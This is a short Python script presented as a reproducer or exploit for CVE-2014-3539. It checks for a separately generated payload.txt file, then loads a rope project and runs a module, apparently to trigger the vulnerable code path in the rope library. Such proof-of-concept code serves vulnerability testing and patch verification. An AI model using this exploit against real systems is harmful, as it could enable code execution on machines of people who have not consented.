#!/usr/bin/env python
# CVE-2014-3539 reproducer/exploit
# Vasyl Kaigorodov <vkaigoro@redhat.com>
# Tested on Python 2.7.x

import sys
from rope.base import project

try:
    open('payload.txt', 'r')
except IOError:
    print("payload.txt not found, run:")
    print("\tpython generate_payload.py")
    sys.exit(1)

myproject = project.Project('project/')
res = myproject.get_resource("hello.py")
myproject.pycore.run_module(res)
